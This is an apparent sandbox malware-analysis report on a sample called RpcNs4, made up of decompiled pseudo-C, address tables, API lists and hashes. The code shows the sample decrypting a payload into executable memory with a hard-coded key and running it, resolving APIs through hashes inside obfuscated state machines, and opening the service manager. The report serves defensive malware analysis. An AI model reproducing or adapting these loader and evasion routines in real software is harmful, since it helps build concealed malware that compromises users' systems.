                                                                                                      • Opcode ID: 2b8f61f1431ea0df09f1c0164b502e9dea853c94572a4a06b0668eda39d2d80c
                                                                                                      • Instruction ID: 7ae2d3f055974e6946f000923a398beb9b46f46489c73d20005b371b7e894a64
                                                                                                      • Opcode Fuzzy Hash: 2b8f61f1431ea0df09f1c0164b502e9dea853c94572a4a06b0668eda39d2d80c
                                                                                                      • Instruction Fuzzy Hash: E621D6606043119AFA20BFB29A4BB2F26645F0071DF10447FF905BA1C3DEFC9A408A6D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 83%
                                                                                                      			E00402000(void* __eflags, struct HACCEL__* _a4, intOrPtr _a16) {
                                                                                                      				long _v8;
                                                                                                      				intOrPtr _v12;
                                                                                                      				struct tagMSG _v40;
                                                                                                      				void* _t17;
                                                                                                      				intOrPtr _t19;
                                                                                                      				void* _t25;
                                                                                                      				int _t28;
                                                                                                      				int _t31;
                                                                                                      				int _t33;
                                                                                                      				void* _t38;
                                                                                                      				void* _t40;
                                                                                                      				long _t43;
                                                                                                      				intOrPtr* _t44;
                                                                                                      				struct HINSTANCE__* _t45;
                                                                                                      				void* _t47;
                                                                                                      				void* _t50;
                                                                                                      				void* _t51;
                                                                                                      
                                                                                                      				_t47 = 0;
                                                                                                      				_t44 = 0;
                                                                                                      				_v8 = 0;
                                                                                                      				_t17 = L00401078(__eflags); // executed
                                                                                                      				if(_t17 == 0) {
                                                                                                      					_t40 = L0040100A(L"kernel32.dll");
                                                                                                      					_t50 = _t50 + 4;
                                                                                                      					if(_t40 != 0) {
                                                                                                      						_t44 = GetProcAddress(0x400000, "lhxXfY9mIrDZ");
                                                                                                      					}
                                                                                                      				}
                                                                                                      				_t19 = L00401014(0xeca, 0x8e9, 0x409,  &_v8);
                                                                                                      				_t51 = _t50 + 0x10;
                                                                                                      				_v12 = _t19;
                                                                                                      				if(_t19 != 0) {
                                                                                                      					_t43 = _v8;
                                                                                                      					_t38 = VirtualAlloc(0, _t43, 0x3000, 0x40); // executed
                                                                                                      					_t47 = _t38;
                                                                                                      					if(_t47 != 0) {
                                                                                                      						 *_t44(_v12, _t43, "*Z59Drrf54QiC$hJ#gOK+69cn8+(xcALhQV>DQd@", 0x29, _t47); // executed
                                                                                                      						_t51 = _t51 + 0x14;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				 *_t47();
                                                                                                      				_t45 = _a4;
                                                                                                      				LoadStringA(_t45, 0x67, 0x436848, 0x64);
                                                                                                      				LoadStringA(_t45, 0x6d, 0x4368b0, 0x64);
                                                                                                      				LoadStringA(_t45, 0x6e, 0x436918, 0x64);
                                                                                                      				L0040107D(_t45);
                                                                                                      				_push(_a16);
                                                                                                      				_t25 = L0040101E(_t45);
                                                                                                      				if(_t25 != 0) {
                                                                                                      					_a4 = LoadAcceleratorsA(_t45, 0x6d);
                                                                                                      					_t28 = GetMessageA( &_v40, 0, 0, 0);
                                                                                                      					__eflags = _t28;
                                                                                                      					if(_t28 != 0) {
                                                                                                      						do {
                                                                                                      							_t31 = TranslateAcceleratorA(_v40, _a4,  &_v40);
                                                                                                      							__eflags = _t31;
                                                                                                      							if(_t31 == 0) {
                                                                                                      								TranslateMessage( &_v40);
                                                                                                      								DispatchMessageA( &_v40);
                                                                                                      							}
                                                                                                      							_t33 = GetMessageA( &_v40, 0, 0, 0);
                                                                                                      							__eflags = _t33;
                                                                                                      						} while (_t33 != 0);
                                                                                                      					}
                                                                                                      					return _v40.wParam;
                                                                                                      				} else {
                                                                                                      					return _t25;
                                                                                                      				}
                                                                                                      			}




















                                                                                                      0x00402009
                                                                                                      0x0040200b
                                                                                                      0x0040200d
                                                                                                      0x00402010
                                                                                                      0x00402017
                                                                                                      0x0040201e
                                                                                                      0x00402023
                                                                                                      0x00402028
                                                                                                      0x0040203a
                                                                                                      0x0040203a
                                                                                                      0x00402028
                                                                                                      0x0040204f
                                                                                                      0x00402054
                                                                                                      0x00402057
                                                                                                      0x0040205c
                                                                                                      0x0040205e
                                                                                                      0x0040206b
                                                                                                      0x00402071
                                                                                                      0x00402075
                                                                                                      0x00402083
                                                                                                      0x00402085
                                                                                                      0x00402085
                                                                                                      0x00402075
                                                                                                      0x00402088
                                                                                                      0x0040208a
                                                                                                      0x0040209d
                                                                                                      0x004020a9
                                                                                                      0x004020b5
                                                                                                      0x004020b8
                                                                                                      0x004020bd
                                                                                                      0x004020c1
                                                                                                      0x004020cb
                                                                                                      0x004020e9
                                                                                                      0x004020f2
                                                                                                      0x004020f4
                                                                                                      0x004020f6
                                                                                                      0x00402104
                                                                                                      0x0040210e
                                                                                                      0x00402114
                                                                                                      0x00402116
                                                                                                      0x0040211c
                                                                                                      0x00402122
                                                                                                      0x00402122
                                                                                                      0x0040212e
                                                                                                      0x00402130
                                                                                                      0x00402130
                                                                                                      0x00402104
                                                                                                      0x0040213d
                                                                                                      0x004020d3
                                                                                                      0x004020d3
                                                                                                      0x004020d3

                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00400000,lhxXfY9mIrDZ), ref: 00402034
                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040206B
                                                                                                      • LoadStringA.USER32 ref: 0040209D
                                                                                                      • LoadStringA.USER32 ref: 004020A9
                                                                                                      • LoadStringA.USER32 ref: 004020B5
                                                                                                      • LoadAcceleratorsA.USER32 ref: 004020D9
                                                                                                      • GetMessageA.USER32 ref: 004020F2
                                                                                                      • TranslateAcceleratorA.USER32(?,?,?), ref: 0040210E
                                                                                                      • TranslateMessage.USER32(?), ref: 0040211C
                                                                                                      • DispatchMessageA.USER32 ref: 00402122
                                                                                                      • GetMessageA.USER32 ref: 0040212E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadMessage$String$Translate$AcceleratorAcceleratorsAddressAllocDispatchProcVirtual
                                                                                                      • String ID: *Z59Drrf54QiC$hJ#gOK+69cn8+(xcALhQV>DQd@$kernel32.dll$lhxXfY9mIrDZ
                                                                                                      • API String ID: 2593799514-3632223656
                                                                                                      • Opcode ID: 02997f93728868d16abe2a17e01b56cc79349e2df2566ec91700d16330bbe572
                                                                                                      • Instruction ID: 1e1217798d64c8bc9b67b94558be025fea950ab5572aa08b8cde754a73d97501
                                                                                                      • Opcode Fuzzy Hash: 02997f93728868d16abe2a17e01b56cc79349e2df2566ec91700d16330bbe572
                                                                                                      • Instruction Fuzzy Hash: 1031B672B4030976EB20ABA19D46FAF7A6C9B08B54F100077FF04B61D1D6F9ED1187A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 189 20b9700-20b9717 190 20b9720-20b9725 189->190 191 20b972b 190->191 192 20b986a-20b986f 190->192 193 20b981b-20b9823 191->193 194 20b9731-20b9736 191->194 195 20b992f-20b9934 192->195 196 20b9875 192->196 201 20b9843-20b9857 193->201 202 20b9825-20b983d call 20b3e70 call 20b3dd0 193->202 203 20b97f9-20b97fe 194->203 204 20b973c 194->204 199 20b993a-20b997d 195->199 200 20b9804-20b9809 195->200 197 20b98de-20b98e5 196->197 198 20b9877-20b987c 196->198 209 20b9902-20b992a call 20b3c90 197->209 210 20b98e7-20b98fd call 20b3e70 call 20b3dd0 197->210 205 20b98cf-20b98d9 call 20b7c20 198->205 206 20b987e-20b9883 198->206 199->190 200->190 208 20b980f-20b981a 200->208 224 20b985b-20b9865 201->224 202->201 203->200 207 20b9982-20b9989 203->207 212 20b973e-20b9743 204->212 213 20b97a5-20b97ac 204->213 205->190 206->200 214 20b9889-20b98ca 206->214 216 20b998b-20b99a1 call 20b3e70 call 20b3dd0 207->216 217 20b99a6-20b99b1 207->217 209->190 210->209 222 20b9745-20b974a 212->222 223 20b9774-20b977b 212->223 220 20b97c9-20b97d8 OpenSCManagerW 213->220 221 20b97ae-20b97c4 call 20b3e70 call 20b3dd0 213->221 214->190 216->217 240 20b99b5-20b99c9 call 20b3000 217->240 225 20b97da-20b97ea 220->225 226 20b97ef-20b97f4 220->226 221->220 222->200 234 20b9750-20b9761 call 20b4220 222->234 227 20b9798-20b97a0 223->227 228 20b977d-20b9793 call 20b3e70 call 20b3dd0 223->228 224->190 225->190 226->190 227->190 228->227 256 20b99cc-20b99d7 234->256 257 20b9767-20b9772 234->257 240->256 257->190
                                                                                                      C-Code - Quality: 73%
                                                                                                      			E020B9700() {
                                                                                                      				char _v524;
                                                                                                      				signed int _v528;
                                                                                                      				char _v536;
                                                                                                      				void* _v544;
                                                                                                      				void* __ebx;
                                                                                                      				void* _t37;
                                                                                                      				void* _t45;
                                                                                                      				void* _t54;
                                                                                                      				void* _t57;
                                                                                                      				void* _t65;
                                                                                                      				void* _t69;
                                                                                                      				intOrPtr* _t72;
                                                                                                      				intOrPtr _t73;
                                                                                                      				void* _t74;
                                                                                                      				void* _t102;
                                                                                                      				void* _t103;
                                                                                                      				void* _t104;
                                                                                                      				void* _t107;
                                                                                                      				void* _t108;
                                                                                                      
                                                                                                      				_t103 = _v528;
                                                                                                      				_t37 = 0x582bf38;
                                                                                                      				_t102 = 0;
                                                                                                      				_t2 = _t102 + 1; // 0x1
                                                                                                      				_t73 = _t2;
                                                                                                      				goto L1;
                                                                                                      				do {
                                                                                                      					while(1) {
                                                                                                      						L1:
                                                                                                      						_t107 = _t37 - 0x16beef78;
                                                                                                      						if(_t107 > 0) {
                                                                                                      							break;
                                                                                                      						}
                                                                                                      						if(_t107 == 0) {
                                                                                                      							_t74 =  *0x20bde30;
                                                                                                      							__eflags = _t74;
                                                                                                      							if(_t74 == 0) {
                                                                                                      								_t74 = E020B3DD0(_t73, E020B3E70(0xf9ab61cb), 0x423474ef, _t104);
                                                                                                      								 *0x20bde30 = _t74;
                                                                                                      							}
                                                                                                      							_t54 =  *_t74(0, _v528, 0, 0,  *0x20be368 + 0x220); // executed
                                                                                                      							__eflags = _t54;
                                                                                                      							_t37 = 0x1957e2ae;
                                                                                                      							_t102 =  ==  ? _t73 : _t102;
                                                                                                      							continue;
                                                                                                      						} else {
                                                                                                      							_t108 = _t37 - 0x58c56de;
                                                                                                      							if(_t108 > 0) {
                                                                                                      								__eflags = _t37 - 0x916b55c;
                                                                                                      								if(_t37 == 0x916b55c) {
                                                                                                      									_t57 =  *0x20bde30;
                                                                                                      									__eflags = _t57;
                                                                                                      									if(_t57 == 0) {
                                                                                                      										_t57 = E020B3DD0(_t73, E020B3E70(0xf9ab61cb), 0x423474ef, _t104);
                                                                                                      										 *0x20bde30 = _t57;
                                                                                                      									}
                                                                                                      									 *_t57(0, 0x25, 0, 0,  &_v524); // executed
                                                                                                      									__eflags =  *0x20be368 + 0x440;
                                                                                                      									E020B3000( *0x20be368 + 0x440);
                                                                                                      									goto L37;
                                                                                                      								} else {
                                                                                                      									goto L18;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t108 == 0) {
                                                                                                      									__eflags =  *0x20bdcb4;
                                                                                                      									if( *0x20bdcb4 == 0) {
                                                                                                      										 *0x20bdcb4 = E020B3DD0(_t73, E020B3E70(0x60f9cb2), 0x5f982ae8, _t104);
                                                                                                      									}
                                                                                                      									_t65 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                                      									_t103 = _t65;
                                                                                                      									__eflags = _t103;
                                                                                                      									if(_t103 == 0) {
                                                                                                      										_t37 = 0x1a3f7140;
                                                                                                      									} else {
                                                                                                      										 *((intOrPtr*)( *0x20be368 + 0x478)) = _t73;
                                                                                                      										_t37 = 0x24e7c50b;
                                                                                                      									}
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									if(_t37 == 0x1fdbe7c) {
                                                                                                      										_t69 =  *0x20bdd78;
                                                                                                      										__eflags = _t69;
                                                                                                      										if(_t69 == 0) {
                                                                                                      											_t69 = E020B3DD0(_t73, E020B3E70(0x60f9cb2), 0x70adb3c9, _t104);
                                                                                                      											 *0x20bdd78 = _t69;
                                                                                                      										}
                                                                                                      										 *_t69(_t103);
                                                                                                      										_t37 = 0x16beef78;
                                                                                                      										continue;
                                                                                                      									} else {
                                                                                                      										if(_t37 != 0x582bf38) {
                                                                                                      											goto L18;
                                                                                                      										} else {
                                                                                                      											_t72 = E020B4220(_t73, 0x47c);
                                                                                                      											 *0x20be368 = _t72;
                                                                                                      											if(_t72 == 0) {
                                                                                                      												L37:
                                                                                                      												return _t102;
                                                                                                      											} else {
                                                                                                      												 *_t72 = E020B7E10;
                                                                                                      												_t37 = 0x58c56de;
                                                                                                      												continue;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L38:
                                                                                                      					}
                                                                                                      					__eflags = _t37 - 0x1e34e32a;
                                                                                                      					if(__eflags > 0) {
                                                                                                      						__eflags = _t37 - 0x24e7c50b;
                                                                                                      						if(_t37 != 0x24e7c50b) {
                                                                                                      							goto L18;
                                                                                                      						} else {
                                                                                                      							_v528 = 0x2015;
                                                                                                      							_v528 = _v528 * 0x2e;
                                                                                                      							_v528 = _v528 + _v528 * 4 + _v528 + _v528 * 4;
                                                                                                      							_t37 = 0x1fdbe7c;
                                                                                                      							_v528 = (_v528 - (0xa41a41a5 * _v528 >> 0x20) >> 1) + (0xa41a41a5 * _v528 >> 0x20) >> 6;
                                                                                                      							_v528 = _v528 ^ 0x0000bd1a;
                                                                                                      							goto L1;
                                                                                                      						}
                                                                                                      					} else {
                                                                                                      						if(__eflags == 0) {
                                                                                                      							_t45 =  *0x20be028;
                                                                                                      							__eflags = _t45;
                                                                                                      							if(_t45 == 0) {
                                                                                                      								_t45 = E020B3DD0(_t73, E020B3E70(0xbb51e2dc), 0x2bebef82, _t104);
                                                                                                      								 *0x20be028 = _t45;
                                                                                                      							}
                                                                                                      							 *_t45(0,  &_v524, 0x104);
                                                                                                      							 *((intOrPtr*)( *0x20be368 + 0x42c)) = E020B3C90( &_v536);
                                                                                                      							_t37 = 0x916b55c;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							__eflags = _t37 - 0x1957e2ae;
                                                                                                      							if(_t37 == 0x1957e2ae) {
                                                                                                      								E020B7C20(_t104);
                                                                                                      								_t37 = 0x1e34e32a;
                                                                                                      								goto L1;
                                                                                                      							} else {
                                                                                                      								__eflags = _t37 - 0x1a3f7140;
                                                                                                      								if(_t37 != 0x1a3f7140) {
                                                                                                      									goto L18;
                                                                                                      								} else {
                                                                                                      									_v528 = 0xb522;
                                                                                                      									_v528 = _v528 | 0xc076dc4c;
                                                                                                      									_v528 = _v528 + 0xfffff316;
                                                                                                      									_v528 = _v528 | 0x16bc97f1;
                                                                                                      									_v528 = _v528 + 0x41f8;
                                                                                                      									_v528 = _v528 ^ 0xd6ff39f1;
                                                                                                      									 *((intOrPtr*)( *0x20be368 + 4)) = 0x20b7e00;
                                                                                                      									_t37 = 0x16beef78;
                                                                                                      									goto L1;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L38;
                                                                                                      					L18:
                                                                                                      					__eflags = _t37 - 0x4d0843c;
                                                                                                      				} while (_t37 != 0x4d0843c);
                                                                                                      				return _t102;
                                                                                                      				goto L38;
                                                                                                      			}






















                                                                                                      0x020b9708
                                                                                                      0x020b970c
                                                                                                      0x020b9712
                                                                                                      0x020b9714
                                                                                                      0x020b9714
                                                                                                      0x020b9717
                                                                                                      0x020b9720
                                                                                                      0x020b9720
                                                                                                      0x020b9720
                                                                                                      0x020b9720
                                                                                                      0x020b9725
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b972b
                                                                                                      0x020b981b
                                                                                                      0x020b9821
                                                                                                      0x020b9823
                                                                                                      0x020b983b
                                                                                                      0x020b983d
                                                                                                      0x020b983d
                                                                                                      0x020b9859
                                                                                                      0x020b985b
                                                                                                      0x020b985d
                                                                                                      0x020b9862
                                                                                                      0x00000000
                                                                                                      0x020b9731
                                                                                                      0x020b9731
                                                                                                      0x020b9736
                                                                                                      0x020b97f9
                                                                                                      0x020b97fe
                                                                                                      0x020b9982
                                                                                                      0x020b9987
                                                                                                      0x020b9989
                                                                                                      0x020b999c
                                                                                                      0x020b99a1
                                                                                                      0x020b99a1
                                                                                                      0x020b99b3
                                                                                                      0x020b99be
                                                                                                      0x020b99c4
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b973c
                                                                                                      0x020b973c
                                                                                                      0x020b97aa
                                                                                                      0x020b97ac
                                                                                                      0x020b97c4
                                                                                                      0x020b97c4
                                                                                                      0x020b97d2
                                                                                                      0x020b97d4
                                                                                                      0x020b97d6
                                                                                                      0x020b97d8
                                                                                                      0x020b97ef
                                                                                                      0x020b97da
                                                                                                      0x020b97df
                                                                                                      0x020b97e5
                                                                                                      0x020b97e5
                                                                                                      0x00000000
                                                                                                      0x020b973e
                                                                                                      0x020b9743
                                                                                                      0x020b9774
                                                                                                      0x020b9779
                                                                                                      0x020b977b
                                                                                                      0x020b978e
                                                                                                      0x020b9793
                                                                                                      0x020b9793
                                                                                                      0x020b9799
                                                                                                      0x020b979b
                                                                                                      0x00000000
                                                                                                      0x020b9745
                                                                                                      0x020b974a
                                                                                                      0x00000000
                                                                                                      0x020b9750
                                                                                                      0x020b9755
                                                                                                      0x020b975a
                                                                                                      0x020b9761
                                                                                                      0x020b99cc
                                                                                                      0x020b99d7
                                                                                                      0x020b9767
                                                                                                      0x020b9767
                                                                                                      0x020b976d
                                                                                                      0x00000000
                                                                                                      0x020b976d
                                                                                                      0x020b9761
                                                                                                      0x020b974a
                                                                                                      0x020b9743
                                                                                                      0x020b973c
                                                                                                      0x020b9736
                                                                                                      0x00000000
                                                                                                      0x020b972b
                                                                                                      0x020b986a
                                                                                                      0x020b986f
                                                                                                      0x020b992f
                                                                                                      0x020b9934
                                                                                                      0x00000000
                                                                                                      0x020b993a
                                                                                                      0x020b993a
                                                                                                      0x020b9947
                                                                                                      0x020b9954
                                                                                                      0x020b9963
                                                                                                      0x020b9971
                                                                                                      0x020b9975
                                                                                                      0x00000000
                                                                                                      0x020b9975
                                                                                                      0x020b9875
                                                                                                      0x020b9875
                                                                                                      0x020b98de
                                                                                                      0x020b98e3
                                                                                                      0x020b98e5
                                                                                                      0x020b98f8
                                                                                                      0x020b98fd
                                                                                                      0x020b98fd
                                                                                                      0x020b990e
                                                                                                      0x020b991f
                                                                                                      0x020b9925
                                                                                                      0x00000000
                                                                                                      0x020b9877
                                                                                                      0x020b9877
                                                                                                      0x020b987c
                                                                                                      0x020b98cf
                                                                                                      0x020b98d4
                                                                                                      0x00000000
                                                                                                      0x020b987e
                                                                                                      0x020b987e
                                                                                                      0x020b9883
                                                                                                      0x00000000
                                                                                                      0x020b9889
                                                                                                      0x020b9889
                                                                                                      0x020b9891
                                                                                                      0x020b9899
                                                                                                      0x020b98a1
                                                                                                      0x020b98a9
                                                                                                      0x020b98b1
                                                                                                      0x020b98be
                                                                                                      0x020b98c5
                                                                                                      0x00000000
                                                                                                      0x020b98c5
                                                                                                      0x020b9883
                                                                                                      0x020b987c
                                                                                                      0x020b9875
                                                                                                      0x00000000
                                                                                                      0x020b9804
                                                                                                      0x020b9804
                                                                                                      0x020b9804
                                                                                                      0x020b981a
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,000F003F), ref: 020B97D2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID: t4B$t4B
                                                                                                      • API String ID: 1889721586-575686366
                                                                                                      • Opcode ID: 6f5a2e901f5c27c7cc871722522a870e469681572e0f1e3248597d99c4e6c382
                                                                                                      • Instruction ID: 5b2ea77bb767a4d64e3bf388368e66aeaed7f06a607cd13483206aae53c84ab1
                                                                                                      • Opcode Fuzzy Hash: 6f5a2e901f5c27c7cc871722522a870e469681572e0f1e3248597d99c4e6c382
                                                                                                      • Instruction Fuzzy Hash: 7751C074B483049BEB7B9F28D4857EE73D2AF85710F508C29A655CB290DB38E844DF52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 259 20b3060-20b3076 260 20b307a-20b307f 259->260 261 20b3080-20b3085 260->261 262 20b308b 261->262 263 20b3163-20b3168 261->263 266 20b3129-20b3131 262->266 267 20b3091-20b3096 262->267 264 20b316a-20b316f 263->264 265 20b31b6-20b3250 263->265 270 20b31a3-20b31b1 call 20b3c90 264->270 271 20b3171-20b3176 264->271 265->260 268 20b3133-20b314b call 20b3e70 call 20b3dd0 266->268 269 20b3151-20b315e 266->269 272 20b3098-20b309d 267->272 273 20b30bf-20b30c6 267->273 268->269 269->260 270->260 278 20b318b-20b3190 271->278 279 20b3178-20b3186 271->279 280 20b30a3-20b30a8 272->280 281 20b3255-20b325d 272->281 275 20b30c8-20b30de call 20b3e70 call 20b3dd0 273->275 276 20b30e3-20b30ee 273->276 275->276 299 20b310b-20b3119 RtlAllocateHeap 276->299 300 20b30f0-20b3106 call 20b3e70 call 20b3dd0 276->300 278->261 288 20b3196-20b31a0 278->288 279->261 280->278 289 20b30ae-20b30b2 280->289 285 20b325f-20b3277 call 20b3e70 call 20b3dd0 281->285 286 20b327d-20b32a0 281->286 285->286 291 20b32a3-20b32ad 286->291 290 20b30b8-20b30bd 289->290 289->291 290->261 299->291 302 20b311f-20b3124 299->302 300->299 302->260
                                                                                                      C-Code - Quality: 71%
                                                                                                      			E020B3060() {
                                                                                                      				void* __ebx;
                                                                                                      				void* __ecx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t54;
                                                                                                      				intOrPtr* _t67;
                                                                                                      				void* _t70;
                                                                                                      				intOrPtr _t81;
                                                                                                      				intOrPtr* _t93;
                                                                                                      				intOrPtr _t94;
                                                                                                      				intOrPtr* _t110;
                                                                                                      				void* _t112;
                                                                                                      				void* _t113;
                                                                                                      				intOrPtr _t114;
                                                                                                      				signed int _t119;
                                                                                                      				void* _t120;
                                                                                                      				void* _t121;
                                                                                                      
                                                                                                      				_t81 =  *((intOrPtr*)(_t120 + 0xc));
                                                                                                      				_t54 = 0x2746532a;
                                                                                                      				_t119 =  *(_t120 + 0x10);
                                                                                                      				_t114 =  *((intOrPtr*)(_t120 + 0x14));
                                                                                                      				_t112 =  *(_t120 + 0x18);
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					do {
                                                                                                      						while(1) {
                                                                                                      							L2:
                                                                                                      							_t121 = _t54 - 0x1b879e60;
                                                                                                      							if(_t121 > 0) {
                                                                                                      								break;
                                                                                                      							}
                                                                                                      							if(_t121 == 0) {
                                                                                                      								_t93 =  *0x20bdf1c;
                                                                                                      								if(_t93 == 0) {
                                                                                                      									_t93 = E020B3DD0(_t81, E020B3E70(0x755194fe), 0xd778cb9a, _t119);
                                                                                                      									 *0x20bdf1c = _t93;
                                                                                                      								}
                                                                                                      								_t114 =  *_t93(_t119 + 0x2c);
                                                                                                      								_t54 = 0x2fd692b6;
                                                                                                      								while(1) {
                                                                                                      									L1:
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t54 == 0x2620d36) {
                                                                                                      									_t67 =  *0x20bddc8;
                                                                                                      									if(_t67 == 0) {
                                                                                                      										_t67 = E020B3DD0(_t81, E020B3E70(0xbb51e2dc), 0x298e8809, _t119);
                                                                                                      										 *0x20bddc8 = _t67;
                                                                                                      									}
                                                                                                      									_t113 =  *_t67();
                                                                                                      									if( *0x20bdcf0 == 0) {
                                                                                                      										 *0x20bdcf0 = E020B3DD0(_t81, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t119);
                                                                                                      									}
                                                                                                      									_t70 = RtlAllocateHeap(_t113, 8, 0x23c); // executed
                                                                                                      									_t112 = _t70;
                                                                                                      									if(_t112 == 0) {
                                                                                                      										goto L29;
                                                                                                      									} else {
                                                                                                      										_t54 = 0x65a2174;
                                                                                                      										while(1) {
                                                                                                      											L1:
                                                                                                      											goto L2;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									if(_t54 == 0x65a2174) {
                                                                                                      										_t110 =  *0x20be018;
                                                                                                      										if(_t110 == 0) {
                                                                                                      											_t110 = E020B3DD0(_t81, E020B3E70(0xbb51e2dc), 0x7bd685bc, _t119);
                                                                                                      											 *0x20be018 = _t110;
                                                                                                      										}
                                                                                                      										 *_t110(_t112 + 0x28, _t119 + 0x2c, (_t114 - _t119 - 0x2c >> 1) + 1);
                                                                                                      										_t94 =  *((intOrPtr*)(_t120 + 0x1c));
                                                                                                      										 *(_t112 + 0x230) =  *(_t94 + 0x18);
                                                                                                      										 *((intOrPtr*)(_t94 + 0x24)) =  *((intOrPtr*)(_t94 + 0x24)) + 1;
                                                                                                      										 *(_t94 + 0x18) = _t112;
                                                                                                      										goto L29;
                                                                                                      									} else {
                                                                                                      										if(_t54 != 0x1936db13) {
                                                                                                      											goto L22;
                                                                                                      										} else {
                                                                                                      											if(_t81 !=  *(_t120 + 0x18)) {
                                                                                                      												L29:
                                                                                                      												return 1;
                                                                                                      											} else {
                                                                                                      												_t54 = 0x2620d36;
                                                                                                      												continue;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							L30:
                                                                                                      						}
                                                                                                      						if(_t54 == 0x2746532a) {
                                                                                                      							 *(_t120 + 0x18) = 0x1355;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) << 3;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) ^ 0x2b7aa775;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) * 0x4e;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) + 0x6616;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) | 0xe186295c;
                                                                                                      							 *(_t120 + 0x18) = ( *(_t120 + 0x18) - (0xbacf914d *  *(_t120 + 0x18) >> 0x20) >> 1) + (0xbacf914d *  *(_t120 + 0x18) >> 0x20) >> 6;
                                                                                                      							 *(_t120 + 0x18) =  *(_t120 + 0x18) ^ 0x8d190104;
                                                                                                      							 *(_t120 + 0x10) = 0x990b;
                                                                                                      							_t87 =  *(_t120 + 0x10);
                                                                                                      							_t54 = 0x1b879e60;
                                                                                                      							 *(_t120 + 0x10) = ( *(_t120 + 0x10) - (0x21fb7813 * _t87 >> 0x20) >> 1) + (0x21fb7813 * _t87 >> 0x20) >> 6;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) >> 8;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) ^ 0x03a1830e;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) << 0xc;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) | 0xea8992c4;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) << 9;
                                                                                                      							 *(_t120 + 0x10) =  *(_t120 + 0x10) ^ 0xfe0623b6;
                                                                                                      							goto L1;
                                                                                                      						} else {
                                                                                                      							if(_t54 == 0x2fd692b6) {
                                                                                                      								_t81 = E020B3C90(_t114);
                                                                                                      								_t54 = 0x36cc697c;
                                                                                                      								while(1) {
                                                                                                      									L1:
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(_t54 != 0x36cc697c) {
                                                                                                      									goto L22;
                                                                                                      								} else {
                                                                                                      									_t54 =  ==  ? 0x2620d36 : 0x1936db13;
                                                                                                      									goto L2;
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						goto L30;
                                                                                                      						L22:
                                                                                                      					} while (_t54 != 0x1a6d5b53);
                                                                                                      					return 1;
                                                                                                      					goto L30;
                                                                                                      				}
                                                                                                      			}



















                                                                                                      0x020b3062
                                                                                                      0x020b3066
                                                                                                      0x020b306c
                                                                                                      0x020b3071
                                                                                                      0x020b3076
                                                                                                      0x020b307a
                                                                                                      0x020b307a
                                                                                                      0x020b3080
                                                                                                      0x020b3080
                                                                                                      0x020b3080
                                                                                                      0x020b3080
                                                                                                      0x020b3085
                                                                                                      0x00000000
                                                                                                      0x00000000
